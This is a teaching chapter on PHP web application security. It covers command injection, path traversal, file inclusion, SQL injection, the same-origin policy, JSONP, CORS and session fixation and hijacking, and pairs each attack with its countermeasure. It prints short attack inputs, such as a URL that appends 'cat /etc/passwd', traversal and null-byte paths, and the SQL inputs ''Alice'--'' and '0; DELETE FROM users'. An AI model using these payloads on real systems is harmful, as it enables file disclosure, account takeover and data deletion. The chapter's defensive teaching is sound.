Web Security PDF
1 Introduction
A web application is an application that uses the web browser, or user agent,
to access a web server. The application can be realized using a server side
implementation or JavaScript running in the web browser. Often a combination
of the two is used. The programming language used on the server can be any
language, but several languages have been developed with web applications in
mind, e.g., PHP, ASP, JSP and Ruby. The examples here use PHP, but the
theory behind most attacks and countermeasures is general and can be applied
to applications written in any language.
When the Internet started to gain popularity, most websites offered static
web pages. The browser downloaded the content, interpreted the HTML code,
and displayed it to the user. However, soon more complex websites were de-
veloped, incorporating more dynamic content. Today, many websites are built
upon user generated content, making the information flow bidirectional. The
server also needs to interpret data provided by users and present it as informa-
tion to other users. This information is often unique to each user, requiring login
support. For personal information it is also important to support robust access
control and authentication of HTTP requests. The wide range of functionality
in modern web applications has had a huge effect on security. Confidentiality
and integrity protection of transported data is supported by SSL, implemented
in all modern browsers. However, web application attacks often exploit
vulnerabilities on the application layer and are independent of the use of SSL,
which is enforced on the transport layer. Still, SSL is a good start as it can
protect the data against attacks on the link between two nodes.
This chapter will give an introduction to security issues and possible attacks
related to web applications. For a more comprehensive treatment, there are
several books on the subject, see e.g., [3, 5].
OWASP is an open community focusing on web application security. The
OWASP website (http://www.owasp.org) contains information about many
different aspects of web application security.
Many attacks targeting web applications rely on the fact that the program-
mer has not validated input from the user. The goal of the attacks can be one
out of very many, e.g., accessing the actual server, stealing cookies, running
the attackers own programs, dumping databases, etc. Correctly validating user
input, making sure that it is as expected, will defend against many of these
attacks. Best practice is to assume that user-supplied data is always
malicious, and take any necessary precautions based on that. Unexpected input
is not only a potential security threat, but could also crash the application.
Validating user input is often just a matter of using a PHP function on the
supplied string. Thus, protecting against these types of attacks is usually very
easy. The programmer just has to be aware of the potential problem and use
the appropriate function to validate the data.
Attacks on web applications can be divided into several categories, but there
is rarely a clear distinction between the categories and some attacks may fall
into several categories. Moreover, attacks in one category can be used to launch
attacks in other categories. Some attacks primarily targeting the actual server
will first be given, while some attacks more targeting users and sessions will
be given later, after a more thorough treatment of the same origin policy and
session management.
<?php
$value = $_GET['name'];
echo "nslookup of $value:<br />";
passthru("nslookup $value");
?>
The function passthru() executes the string and passes the result directly to
the standard output, i.e., to the user agent. Since user input is used to run
commands on the server machine, this code will allow an attacker to run any
command on the server, provided that the web server is allowed to run it on the
machine. Requesting the URL
script.php?name=127.0.0.1%3B+cat+%2Fetc%2Fpasswd
will run the command
nslookup 127.0.0.1; cat /etc/passwd
displaying the file with hashed passwords to the attacker. Even though the hashed
passwords are usually stored in a shadow file today, the example shows the
vulnerability, and even simple commands such as listing directories, deleting
specific files, or displaying configuration information are a potential threat
to the server.
PHP provides two functions that can be used to make sure the above attack
is not possible.
• escapeshellcmd($arg) will escape, i.e., precede with a backslash, several
special characters that can be used to trick the shell into executing arbitrary
commands.
• escapeshellarg($arg) will put single quotes around the string and escape
any single quotes inside the string. If the result is used as an argument to
a command, it will always be treated as a single argument, avoiding the
situation above.
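As a minimal sketch of how the vulnerable nslookup script could be hardened, the snippet below passes the user input through escapeshellarg() before it reaches the shell. The helper name build_nslookup_command() is hypothetical and introduced only for illustration, and the quoting described in the comments assumes a Unix-like server.

```php
<?php
// Hypothetical helper (not part of the original example): builds the shell
// command with the user-supplied value quoted as one single argument.
function build_nslookup_command(string $value): string
{
    // On Unix-like systems escapeshellarg() wraps the value in single quotes,
    // so "; cat /etc/passwd" can no longer start a second command.
    return 'nslookup ' . escapeshellarg($value);
}

// Typical use inside the script:
//   passthru(build_nslookup_command($_GET['name']));
```

With the malicious request shown earlier, the shell would receive the whole string 127.0.0.1; cat /etc/passwd as one quoted host name, so the lookup simply fails. Stricter validation, e.g., checking that the value is a well-formed IP address, could be added on top of this.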
<?php
$username = $_GET['name'];
$filename = "/home/users/$username";
readfile($filename);
?>
The function readfile() simply reads the file passed as argument and sends
its content to the standard output. The idea is that each user has a unique
part of a webpage, and the rest of the page is static. The problem is that the
filename is completely determined by the user, without any validation of the
input. An attacker can e.g., pass the filename ../../etc/passwd as a GET
parameter, attempting to retrieve the content of the password file. The fact
that it is possible to use ../ in the filename, allows the attacker to traverse the
filesystem and read any file that the web server is allowed to read. Also the
PHP files used to create the webpages can be read, possibly disclosing database
passwords in the code or perhaps other even more severe vulnerabilities.
PHP provides several functions that can be used to filter paths.
• realpath() will analyze the path, translating ./ and ../ and return an
absolute path. The input /home/users/../../etc/passwd would return
/etc/passwd.
• basename() returns the filename, removing the directory path. The input
/etc/passwd would return passwd.
• dirname() returns the directory, removing the filename from the path.
The input /etc/passwd would return /etc.
Note that none of the functions above will stop an attacker from accessing files in
the same directory. One additional protection is thus to place the files that can
be accessed in a separate directory. Alternatively, access control mechanisms
provided by the underlying operating system can be used to protect files that
should not be accessed. An even better idea is to have a whitelist of accepted
filenames and check that an input matches an entry in the list.
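The whitelist idea can be sketched as follows. This is only an illustration under stated assumptions: the helper name user_file_path() and the list of allowed user names are hypothetical, and a real application would obtain the list from its own user database.

```php
<?php
// Hypothetical helper: maps a user name from the request to a file path,
// or returns null if the name is not explicitly allowed.
function user_file_path(string $username, array $allowedUsers): ?string
{
    // Strict comparison against the whitelist; anything else is rejected.
    if (!in_array($username, $allowedUsers, true)) {
        return null;
    }
    // basename() is kept as an extra safeguard should the list itself ever
    // contain an entry with a directory component.
    return '/home/users/' . basename($username);
}

// Typical use:
//   $path = user_file_path($_GET['name'] ?? '', ['alice', 'bob']);
//   if ($path !== null) { readfile($path); }
```

Because the input must match a list entry exactly, a value such as ../../etc/passwd never reaches readfile().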
1.3 Local and Remote File Inclusion
The PHP function include() allows the programmer to open a file and interpret
the content of that file. This is very useful if several pages on one website partly
contain the same information, e.g., a standard header or footer, but it can also
be used to make parts of the page user dependent. In those cases, the included
filename could be based on information sent in a GET or POST request. In the
example below, the file to be included is simply sent in a GET request.
<?php
$pagename = $_GET['page'];
include($pagename);
?>
Requesting the page .../index.php?page=joe.php will result in the script
opening the file joe.php and interpreting its content. In a file inclusion attack,
the adversary takes advantage of the input dependent choice of file to include.
In the local variant of the attacks, another file on the system is passed as value
for the page parameter, while in a remote file inclusion attack, a URL is passed
to a remote file, typically written by the attacker. The remote file could e.g.,
contain <?php passthru('ls'); ?>, and will then list the current directory on
the server.
A variant of the code above could be to assume that the file included is a
PHP file.
<?php
$pagename = $_GET['page'];
include($pagename . ".php");
?>
In that case, the request would simply pass joe instead of joe.php. It would seem
that the attack in this case is restricted to including only PHP files, but this is
not the case. The attacker could e.g., send a modified request.
.../index.php?page=http://www.ietf.org/rfc/rfc2616.txt?
This would result in PHP including the file
http://www.ietf.org/rfc/rfc2616.txt?.php
and since the “?” is a metacharacter in a URL separating the path and query
string with GET parameters, the file would be retrieved. Including local non-
PHP files is also still possible by appending a null character to the file. The
null character defines the end of a string and anything after is by definition not
part of the string. The path with URL encoded query string
.../index.php?page=/etc/passwd%00
could be used to include the password file.
There are two php.ini directives that determine if files can be retrieved
from remote sources.
• allow_url_fopen determines if URLs can be treated as files in any functions
that open files.
• allow_url_include determines if URLs can be treated as files in the functions
include(), include_once(), require() and require_once().
Note that the first has to be set to On in order for the second to be relevant. The
default setting is to enable allow_url_fopen and disable allow_url_include.
Prior to PHP 5.2.0, only allow_url_fopen was used, defaulting to On.
Even with both these settings turned off, local files can be included. Re-
questing .../index.php?page=/etc/passwd would display the system’s pass-
word file since it is local. To specify from which directories PHP is allowed to
access files, the php.ini directive open_basedir can be used. Specifying
open_basedir = /var/www:/home/joe/public
would restrict PHP's file access to those two directories and their subdirectories.
On Windows, a semicolon is used to separate directories.
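In addition to the configuration directives, the script itself can refuse to include anything that is not explicitly expected. The following is a minimal sketch of such a whitelist. The constant ALLOWED_PAGES, the helper resolve_page() and the page names are hypothetical and only serve as an illustration.

```php
<?php
// Hypothetical mapping from public page names to files that may be included.
const ALLOWED_PAGES = [
    'joe'   => 'joe.php',
    'alice' => 'alice.php',
];

// Returns the file to include for a requested page, or null if the page
// name is not in the whitelist.
function resolve_page(string $page): ?string
{
    return ALLOWED_PAGES[$page] ?? null;
}

// Typical use in index.php:
//   $file = resolve_page($_GET['page'] ?? '');
//   if ($file !== null) { include($file); }
```

Since the user input is only used as a lookup key and never as a path, neither local paths nor remote URLs can end up in include().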
$uname = $_POST['username'];
$pass = $_POST['passwd'];
$result = mysql_query("SELECT * FROM login WHERE
username='".$uname."' AND pword='".$pass."'");
if ($result) {
    if (mysql_num_rows($result) == 1) {
        session_regenerate_id();
        ...
    }
}
The code above highlights an important issue when interacting with databases.
The fact that the password is not stored as a hash value with an additional
salt as input to the hash function is a disaster in itself. However, this is not
immediately related to the SQL injection attack. Instead, the issue here is that
data entered by the user is immediately passed to SQL as part of the query.
There is nothing that prevents a user from sending data formatted such that
the semantics of the SQL statement is changed. Consider the following POST
request.
POST / HTTP/1.1
Host: www.server.com
...
username=Alice'-- &passwd=
Such a POST request will on the server be translated to the following SQL
query.
SELECT * FROM login WHERE username='Alice'-- ' AND pword=''
The double hyphen is considered to be a comment so the rest of the line is
ignored. Thus, it will have the same meaning as
SELECT * FROM login WHERE username='Alice'
This will allow an attacker to login as Alice without knowing her password.
Again, lack of input validation is the source of the vulnerability. PHP provides
the function mysql_real_escape_string(), which can be used to escape special
characters, e.g., single and double quotes. While this provides good protection,
care needs to be taken when using integers as they do not have to be surrounded
by single quotes in the query. Using sqlite_query(), the function used to send
queries to the SQLite database, a user with a certain numerical ID can be
extracted as follows.
$id = $_POST[’id’];
$id = sqlite_escape_string($id);
$result = sqlite_query($db, "SELECT * FROM users WHERE id={$id}");
If the user supplies the id 0; DELETE FROM users the query string will be
translated to
SELECT * FROM users WHERE id=0; DELETE FROM users
since there is nothing in the string to escape. This will execute both queries and
all rows in the table “users” will be deleted. The reason for using SQLite here
and not MySQL is that multiple queries are not allowed in mysql_query(). Always
quoting integers as well, or type casting them to int, are possible protections
against this attack.
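A minimal sketch of validating a numeric parameter before it is placed in a query is given below. The helper name parse_id() is hypothetical. It relies on filter_var() with FILTER_VALIDATE_INT, which returns false for anything that is not a plain integer.

```php
<?php
// Hypothetical helper: returns the ID as an integer, or null if the input
// is not a plain integer.
function parse_id(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT);
    // Compare with === false, since the valid ID 0 is also "falsy".
    return ($id === false) ? null : $id;
}

// Typical use:
//   $id = parse_id($_POST['id'] ?? '');
//   if ($id === null) { /* reject the request */ }
```

A plain (int) cast would instead silently turn the malicious string 0; DELETE FROM users into 0. Rejecting the request, as in the sketch, makes the invalid input visible to the application.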
There are many more examples of what can be done using SQL injection
attacks. Dumps of databases with passwords, either in clear text or hashed,
have been reported many times. This is not just a problem for the users, but
also a problem for the website itself. Many sites depend on users trusting them
with sensitive information, and once this trust is broken, the users may stop
using that particular site or service.
1.4.1 Prepared Statements
Some protections have already been given above. Escaping special characters
will protect against most SQL injection attacks. However, there are even better
ways. Using prepared statements the SQL logic can be completely separated
from the data used in the query. Then the attacks will not be possible as
everything that is provided by the user will be treated as data, and not as logic.
This additionally makes the interaction with the database more efficient since
the logic is sent once, and only data is sent for each new query. By preparing a
statement like
SELECT * FROM login WHERE username=? AND pword=?
the question marks are used as placeholders for data that will be supplied when
the query is made. Independent of the format of the data, it will still only be
considered as data. When preparing the statement, the question marks are only
valid in certain places. They can not be used for table and column names (which
still opens up for attacks if they have to be dynamically assigned). An example
using MySQL is given below. Note that the MySQLi extension has to be used
as the MySQL extension for PHP does not support prepared statements.
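$uname = $_POST['username'];
$pass = $_POST['passwd'];
$a = mysqli_connect('host','mysqlUser','mysqlPassword','users');
/* Prepare the statement; the ? placeholders are filled in as pure data */
$b = mysqli_prepare($a, "SELECT username FROM login WHERE username=? AND pword=?");
mysqli_stmt_bind_param($b, "ss", $uname, $pass);
mysqli_stmt_execute($b);
/* Fetch the matching user name, if any, into $u_name */
mysqli_stmt_bind_result($b, $u_name);
mysqli_stmt_fetch($b);
if ($u_name) {
    /*User is authenticated*/
    session_regenerate_id();
    ...
}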
If prepared statements are used for all database queries and all user supplied
data is parameterized, then SQL injections are not possible.
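The caveat about table and column names can be handled with a whitelist, since placeholders cannot be used for identifiers. The following sketch assumes a hypothetical helper build_user_list_query() and hypothetical column names. It only builds the SQL text, which would then be prepared and executed as usual.

```php
<?php
// Hypothetical helper: builds a query where the sort column is chosen by
// the user. The column names are assumptions for illustration.
function build_user_list_query(string $sortColumn): string
{
    $allowedColumns = ['username', 'created', 'email'];
    if (!in_array($sortColumn, $allowedColumns, true)) {
        // Fall back to a fixed default instead of using the raw input.
        $sortColumn = 'username';
    }
    // Data values still go through placeholders; only the whitelisted
    // identifier is concatenated into the SQL text.
    return "SELECT * FROM login WHERE username LIKE ? ORDER BY $sortColumn";
}
```

The user input is never copied into the statement. It only selects one of the identifiers that the programmer has written down in advance.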
2 Same-Origin Policy
One of the most fundamental aspects of web security is the same-origin policy.
This policy prevents documents from one origin from receiving information in
documents from another origin. The origin is defined by the combination of
protocol, domain name and port. As one example, a document received from
http://evil.com should not be able to read information from a document
received from http://example.com. To see the motivation for this policy, con-
sider the case when there are two windows open at the same time. In this case
it should not be possible for one window to read the cookies corresponding to
another window since this could be used to steal login credentials from that
window. Another example is when firewalls are used. Documents behind a fire-
wall can not be accessed by an attacker. However, if it would be possible for
e.g., JavaScript to read information in documents in other origins, an attacker’s
webpage can contain a script that retrieves information from origins that are
inside a firewall. Since it is the IP of the victim that is used in the request, it
could be possible to bypass the firewall rules.
The policy can differ slightly between different implementations and spe-
cific rules can change between different versions of the same browser. A de-
tailed overview can be found in [8]. Often, the same-origin policy refers to how
JavaScript can access the Document Object Model (DOM) tree for documents in
other domains. The DOM is a representation of a document in a tree structure.
It defines the objects and properties of the HTML elements, and also defines
methods for accessing them. Refer to [7] for an overview. The user agent only
allows JavaScript to read the DOM if the two are associated with the same
origin, i.e., they share protocol, domain and port. The JavaScript code itself is
associated with the origin of the document running the script, but can be down-
loaded from anywhere using <script src="...">. The script will then be able
to access the DOM of the document running the script, but not documents on
the domain from which it was downloaded.
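The origin comparison itself is performed by the user agent, not by server code, but the rule can be illustrated with a short sketch. The helpers origin_of() and same_origin() are hypothetical, and the default ports 80 and 443 for http and https are filled in as an assumption of this sketch.

```php
<?php
// Hypothetical helper: extracts the (protocol, domain, port) triple of a URL,
// or returns null if the URL has no protocol or domain.
function origin_of(string $url): ?array
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    $scheme = strtolower($parts['scheme']);
    // Assumed default ports for the two schemes considered here.
    $defaultPorts = ['http' => 80, 'https' => 443];
    $port = $parts['port'] ?? ($defaultPorts[$scheme] ?? null);
    return [$scheme, strtolower($parts['host']), $port];
}

// Two URLs have the same origin if all three components are equal.
function same_origin(string $a, string $b): bool
{
    $originA = origin_of($a);
    return $originA !== null && $originA === origin_of($b);
}
```

For instance, http://example.com/a.html and http://example.com:80/b/c.html share an origin, while changing the protocol to https, the domain to evil.com, or the port to 8080 gives a different origin.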
The basic policy in network access is that documents, and JavaScripts in
those documents, in one origin can send information to other origins, but they
cannot read information from another origin. Allowing documents to send information
to other origins is needed for hyperlinks, which send a GET request
to the domain specified by the link. It has also the consequence that POST
requests can be sent to any domain. This can be used to send cookies and other
pieces of information to a server controlled by an attacker, a common goal in an
XSS attack. It can also be used in the CSRF attack to send authorized requests
appearing to have been initiated by a victim. Disallowing documents to read
information from other origins is very conservative and there are some excep-
tions to this rule. One exception is reading JavaScripts, as mentioned above.
Another exception is the inclusion of images from other domains. Using <img
src="...">, a document can read an image from another origin and include
it in its own DOM. The origin of the image is then the same as the document
itself, even though it originates from another origin. The same applies to style
sheets (CSS), which can be loaded from any domain.
Also for network access within the same origin, there are exceptions. The
actual rules are browser dependent but it is typical to e.g., block access to port
25 (SMTP) to avoid spam. Several other exceptions exist in order to prevent
potential abuse.
The parameter document.domain can be set by the documents to a parent
domain of the actual domain. If both documents explicitly set this parameter
to the same domain, then access will also be granted. As an example,
a.example.com does not have the same origin as b.example.com, so the docu-
ments will not have access to each other by default. However, both documents
can explicitly set the document.domain parameter to example.com in order to
get access to each other. One drawback is of course that any document with
domain ending with example.com can get access to these documents by setting
its own document.domain parameter to example.com. Some browsers allow set-
ting the parameter to com while others require at least two levels of the domain
name.
The same-origin policy for XMLHttpRequest is similar to that of DOM, but
it is not possible to use the document.domain parameter to mutually agree to
make cross-domain requests.
Other contexts that have their own same-origin policy are e.g., Java, Flash
and Silverlight.
A DNS rebinding attack tricks the browser to think that two documents
with different origin have the same origin. This can e.g., allow an attacker to
obtain information about resources on an internal network.
remote file inclusion attack, neither can it prevent information retrieval from
other origins as long as they take place on the server before the information is
delivered to the user-agent.
used in responses to XMLHttpRequests. The data format is described in RFC
4627 [2]. It is based on JavaScript but is actually language independent since any
language can parse the data. JSON data consists of objects and arrays. Each
object is enclosed in curly brackets, { and }, and has one or several string:value
pairs separated by comma. The value can be an object itself. If one object has
several values, these are given in an array, enclosed in square brackets, [ and
]. This is best illustrated by an example. Below is a JSON representation of a
student’s data.
{
"name":"Sven Svensson",
"status":
{
"avgGrade":"4.5",
"hp":"135"
},
"course grades":
[
{
"course code":"EIT060",
"grade":"5"
},
{
"course code":"EITF05",
"grade":"4"
}
]
}
Recall that XMLHttpRequest can only be used to make calls to servers in the
same origin so the JSON data can only be received from the same origin. The
data to request can be given by the URL, so the student data above can be
requested using e.g.,
http://www.example.com/students?id=123
assuming that Sven Svensson has ID 123.
If instead the data is requested from a domain in another origin, the <script>-
tag must be used since that is not subject to same-origin checks. On the other
hand, the JSON data is not a valid script (although it is valid JavaScript syn-
tax).
JSON with Padding (JSONP) is one way to get around this obstacle. The
idea is to transform the JSON data into a valid script. First, a <script>-tag is
dynamically created in the DOM at the time the data is to be retrieved. The
“src” parameter of the <script>-tag can then include URL-encoded data similar
to the one above in order to specify which data is requested. The server then
embeds the JSON data inside a function call to make it a valid JavaScript. The
name of the function can be specified by the user-agent as a callback parameter,
such that it can fit the rest of the JavaScript code in the document.
http://www.example.com/students?id=123&callback=studentData
Using the example data above, the (valid) JavaScript that is returned from the
server would then be
studentData({"name":"Sven Svensson","status":{"avgGrade":"4.5",
"hp":"135"},"course grades":[{"course code":"EIT060",
"grade":"5"},{"course code":"EITF05","grade":"4"}]})
i.e., the data would be the argument to a function call. The document is now free
to do anything with this data if the function has been defined in the document.
The function is executed immediately after it has been received by the document,
known as On-Demand JavaScript. The padding is the extra function call added
by the server. This padding could also be e.g., a variable assignment. Moreover,
in theory the data does not have to be JSON data, it can be anything as long as
it follows the rules set by the JavaScript language and that the resulting response
from the server can be assigned to the “src” parameter of the <script>-tag.
JSONP is very common to use as it more or less makes cross origin requests
both possible and flexible. One drawback is of course that JSONP has to be
supported by the server.
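On the server side, the padding step could be sketched as below. The helper name jsonp_response() is hypothetical. The check that the callback is a plain identifier is an assumption added in this sketch and not something described above. It is included because the callback name is user-controlled and ends up inside a script.

```php
<?php
// Hypothetical helper: wraps data in a JSONP function call.
function jsonp_response(string $callback, array $data): ?string
{
    // Assumption beyond the text: only accept a plain identifier as the
    // callback name, so the parameter cannot inject arbitrary script.
    if (!preg_match('/^[A-Za-z_$][A-Za-z0-9_$]*\z/', $callback)) {
        return null;
    }
    // The padding is the function call placed around the JSON data.
    return $callback . '(' . json_encode($data) . ')';
}

// Typical use:
//   header('Content-Type: application/javascript');
//   echo jsonp_response($_GET['callback'] ?? '', $studentData);
```

Called with the callback studentData, the helper returns the JSON data as the argument of a call to studentData(), as in the response shown above.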
and POST requests, the user-agent sends the Origin header with information
about the origin of the document. The server can look at this header and
decide if it should send a response. In the response, the server adds the
Access-Control-Allow-Origin header, specifying the same origin that was sent in the
Origin header of the request. This tells the user-agent that the document is allowed to
receive data from the server. The server can also choose to send a wildcard (*)
indicating that any domain is allowed to request the data.
An example of an HTTP request and an HTTP response using CORS is given
below.
HTTP/1.1 200 OK
...
Access-Control-Allow-Origin: http://www.example.com
For requests that are not simple, the user-agent must first make a preflight re-
quest in order to check which methods are allowed. If the request to be made is
e.g., a PUT or a DELETE request, the user-agent checks whether these requests
are allowed before actually making them. Also, if headers other than simple
headers are to be used, e.g., custom headers, there is also a preflight request to
determine if these headers are allowed in a cross-domain request. The headers
used in the preflight requests are Access-Control-Request-Method to indicate the
method to be used and Access-Control-Request-Headers to indicate which headers
will be used. Corresponding headers, Access-Control-Allow-Methods
and Access-Control-Allow-Headers, are sent in the response to determine what
is allowed. Moreover, to avoid having the user-agent make unnecessarily many
preflight requests, the server can use the Access-Control-Max-Age header to indicate
for how long, in seconds, the preflight information can be cached by
the user-agent. The preflight request uses the OPTIONS method. An example
is given below.
OPTIONS /students/ HTTP/1.1
Host: www.server.com
...
Origin: http://www.example.com
Access-Control-Request-Method: PUT
Access-Control-Request-Headers: X-SPECIALHEADER
HTTP/1.1 200 OK
...
Access-Control-Allow-Origin: http://www.example.com
Access-Control-Allow-Methods: GET, PUT, DELETE
Access-Control-Allow-Headers: X-SPECIALHEADER
Access-Control-Max-Age: 3600
If the document wants to send a DELETE request within one hour, a new
preflight request is not necessary since the user-agent already knows that the
http://www.example.com origin is allowed to make DELETE requests and this
information can be cached for one hour.
By default, an XMLHttpRequest does not send a cookie in a request, but
it can be optionally added by the script. However, responses to requests with
cookies are not accepted by the user-agent unless the response includes the
Access-Control-Allow-Credentials header with the value true. Moreover, the
response must also set an explicit origin for the Access-Control-Allow-Origin
header. If a wildcard is used, the user-agent also rejects the response (i.e.,
its content is not made available to the script). The Access-Control-Allow-
Credentials header allows the server to control if user specific access control can
be used in the cross-origin requests.
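The server-side decision described above can be sketched as a small function that returns the response headers to send. The helper name cors_headers() and the list of allowed origins are hypothetical. The sketch only covers the Access-Control-Allow-Origin and Access-Control-Allow-Credentials headers, not the preflight headers.

```php
<?php
// Hypothetical helper: decides which CORS response headers to send for a
// given request Origin header. The list of allowed origins is an assumption.
function cors_headers(?string $origin, array $allowedOrigins, bool $withCredentials = false): array
{
    if ($origin === null || !in_array($origin, $allowedOrigins, true)) {
        // No CORS headers: the user-agent will not make the response
        // available to a script from another origin.
        return [];
    }
    // Echo the explicit origin rather than "*", which is required when
    // credentials such as cookies are involved.
    $headers = ['Access-Control-Allow-Origin: ' . $origin];
    if ($withCredentials) {
        $headers[] = 'Access-Control-Allow-Credentials: true';
    }
    return $headers;
}

// Typical use:
//   $origin = $_SERVER['HTTP_ORIGIN'] ?? null;
//   foreach (cors_headers($origin, ['http://www.example.com'], true) as $h) {
//       header($h);
//   }
```

Returning the headers as strings keeps the decision separate from the actual call to header(), which makes the logic easy to check in isolation.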
3 Sessions
The HTTP protocol is stateless, meaning that there is no inherent memory that
connects two subsequent HTTP requests. In many web applications, an HTTP
response needs to depend, not only on the corresponding request, but on
many previous requests. An example is a web store, where the customers put
items in a virtual shopping cart. Items need to stay in the cart as the user con-
tinues to browse the store. Another example, more directly related to security,
is websites which require authentication. A user should be able to
log in once and then browse the website while staying logged in. Basic and Digest
authentication, which are both built into the HTTP protocol, accomplish this
by sending login credentials with each request. While the security of these solu-
tions is enough in many situations, they do not allow for session management.
Moreover, they are not very flexible and the user interface is not customizable.
Sessions are used to keep users logged in, without having to send the login
credentials with every request (in some sense this is still done), and to allow
the server and the browser to keep a state with information about previous
actions. Often, a session can be initialized and used before a user has logged in,
and continued after the user is logged in. More privileges are then given to the
user once authenticated and logged in. A simple variable can be used to know
whether the user is logged in or not.
Session information can be stored on the client side in two main ways.
• Cookies: This is the most common alternative for session management
and the primary use of cookies. They can also be used for user tracking,
but this is just a special case of session management.
• URL parameters: The session is maintained by sending session infor-
mation in the URL. Every time a relative link is followed, the session
information is attached in the query string of a GET request. The rel-
ative links are automatically rewritten each time a page is generated to
contain the correct session ID. If forms are posted, a hidden field is used
to send the session ID to the server.
session into the superglobal variable $_SESSION. With the php.ini directive
session.auto_start, sessions are automatically started without having to use
session_start(). The default name of a session in PHP is PHPSESSID, but
this can be changed using the session.name directive in php.ini.
A small example of session handling in PHP is given below, where the number
of times a user has visited a page (during one session) is counted.
<?php
session_start();
if (isset($_SESSION['count'])) {
    $_SESSION['count']++;
}
else {
    $_SESSION['count'] = 1;
}
?>
The function session_destroy() can be used to remove the session ID and
delete the parameters from the server. The fact that session parameters are
stored on the server is a potential security threat. Anyone with access to the
server has also access to the session parameters for users with an open session.
The use of cookies and/or URL parameters to realize a session, can be con-
figured in the php.ini file using the directives
• session.use_cookies: Specifies if cookies should be used to transmit
the session ID. Default is “1”.
• session.use_only_cookies: Specifies if cookies should be the only way
to store the session ID on the client. If this is set to “1”, a session ID sent
in the URL will not be accepted. Default is “1” since PHP 5.3.0.
• session.use_trans_sid: Specifies if relative links should be transparently
rewritten to contain the session ID. Default is “0”.
currently used by a user. By submitting the session ID in a request the attacker
will look like the user to the server. This is in many ways the same thing as
breaking the password, though there is an important difference, namely that
once the session is terminated, the attacker can no longer impersonate the user
(without learning the session ID again). Any attacks that require retyping the
password will not work. Often, websites require you to type the old password
if you want to change it.
There are several ways of learning the session ID of a user. The attacks
can be divided into those that force a victim to use a session ID chosen by the
attacker, called session fixation, and attacks that attempt to learn the session
ID already in use, called session hijacking. Session fixation attacks start before
the victim logs in, while session hijacking attacks start after the victim logs in.
<?php
if (!isset($_SESSION['ServGen'])) {
session_destroy();
}
session_regenerate_id();
$_SESSION['ServGen'] = TRUE;
?>
However, even with this protection, an attack would be possible if the attacker
initializes the session before the ID is sent to the victim. The new attack would
then proceed as follows.
1. The attacker visits the target server.
2. The target server sends an ID generated by the server. The session ID is
put in all relative links (and perhaps also in a cookie).
3. The attacker takes the server generated ID “SID” and tells the victim to
visit the target server using the link
www.server.com/script.php?PHPSESSID=SID.
4. The victim clicks the link and is directed to the target server, sending SID
as session ID in a GET parameter. The victim is now using the session
initiated by the attacker. As before, the victim logs into his/her account
on the server.
5. The attacker knows the server generated session ID used between the
victim and the target server, and can now send requests to the
server, logged in as the victim.
Clearly, it is not enough to use only server generated session IDs. A simple
protection against this attack is to generate a new ID every time privileges are
changed.
<?php
session_regenerate_id();
$_SESSION['logged_in'] = TRUE;
?>
Then, in step 5, the attacker will try to use an old ID, which does not correspond
to the logged in victim.
Another protection is of course to not allow the session ID to be sent in
the URL at all. This is accomplished using session.use_only_cookies = 1 as
discussed in Section 3.1. This of course comes with the drawbacks of only
allowing cookies to be used for session management.
There is a temporal issue in the attack that can be used to limit the usefulness
of the attack. In step 5 above it is required that the session is still valid,
otherwise the attacker will not be logged in as the victim. Servers can provide
a logout function that removes the session.
<?php
if (!empty($_GET['logout'])) {
session_destroy();
}
?>
The protection is of course dependent on users actually using the logout func-
tionality.
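Since the logout protection depends on the user, a server could additionally end sessions that have been idle for too long. This is an assumption that goes beyond the logout function described above. The sketch below uses a hypothetical helper session_expired() and a hypothetical session entry named last_activity.

```php
<?php
// Hypothetical helper: true if the session has been idle for too long.
function session_expired(int $lastActivity, int $now, int $maxIdleSeconds): bool
{
    return ($now - $lastActivity) > $maxIdleSeconds;
}

// Typical use after session_start(), assuming a 'last_activity' entry
// (a name chosen for this sketch) is kept in $_SESSION:
//   if (isset($_SESSION['last_activity'])
//       && session_expired($_SESSION['last_activity'], time(), 1800)) {
//       session_destroy();
//   } else {
//       $_SESSION['last_activity'] = time();
//   }
```

With an idle limit of 1800 seconds, a fixated session that the victim abandons without logging out becomes useless to the attacker after half an hour.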
3.2.2 Session Hijacking
In a session hijacking attack, the adversary learns a session ID that is currently
used by a victim and a target server. This can be done in many ways and
this section will cover the two simplest attacks, namely session prediction and
session sniffing. Cross site scripting (XSS) attacks can also be used for session
hijacking, but XSS attacks are more general and can be used for many other
purposes as well. (XSS is how it is done, while session hijacking is what is
accomplished.) For this reason, XSS will be treated separately in Section 4.
In session prediction, the attacker simply guesses the session ID. This can be
feasible if the generated IDs are not random enough. If e.g., a counter is used
on the server side, a known session ID gives full information about subsequent
IDs. For session IDs based on a function of the user name and e.g., a time
stamp, the number of IDs that have to be guessed until a valid ID is found
is very limited. By analyzing several known valid session IDs, an attacker can
figure out how they are generated and predict values of unknown session IDs.
In PHP, the developer can set the session ID using the function session_id().
The best protection against this attack is to let the server determine the session
ID randomly.
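The difference between a predictable and a random ID can be sketched as follows. The function names counterSessionId and randomSessionId are hypothetical and only serve the illustration. PHP's built-in session handling generates the ID itself, so in practice it is usually enough not to override it with session_id().

```php
<?php
// Predictable: a counter-based ID reveals every subsequent ID.
function counterSessionId(int $previous): string
{
    return (string) ($previous + 1);
}

// Unpredictable: bytes from the system's cryptographic random source, hex encoded.
function randomSessionId(int $bytes = 32): string
{
    return bin2hex(random_bytes($bytes));
}

echo counterSessionId(1041), "\n"; // an attacker who has seen 1041 can guess this
echo randomSessionId(), "\n";      // 64 hex characters, different on every call
```

With 32 random bytes there are 2^256 possible IDs, so knowing earlier IDs gives no information about later ones.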
In session sniffing, the attacker eavesdrops on the connection between the victim
and the server. Unless some confidentiality protection is used, HTTP requests
contain the cookies in unencrypted form. Internet traffic is routed through
several nodes, and every node can potentially read what is in a packet. However,
Internet routers are not as critical as unencrypted wireless networks. There, an
attacker can just eavesdrop on the unencrypted traffic, and when a cookie is found,
that session can be stolen. Wired switched networks are almost as vulnerable
if an ARP spoofing attack is used. The obvious protection is to always encrypt
the traffic using e.g., SSL. Note that it is not sufficient to use SSL only during
login, when the username and password are sent. It must be enabled during the
full session.
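One way to keep the whole session on an encrypted connection is to redirect every unencrypted request. The sketch below assumes a hypothetical helper httpsRedirectTarget() that receives an array shaped like $_SERVER and the site's own configured host name. It is an illustration, not a complete solution.

```php
<?php
// Return the HTTPS URL to redirect to, or null if the request is already encrypted.
// $server has the shape of $_SERVER; $host is the site's own configured host name.
function httpsRedirectTarget(array $server, string $host): ?string
{
    $https = (string) ($server['HTTPS'] ?? '');
    if ($https !== '' && strtolower($https) !== 'off') {
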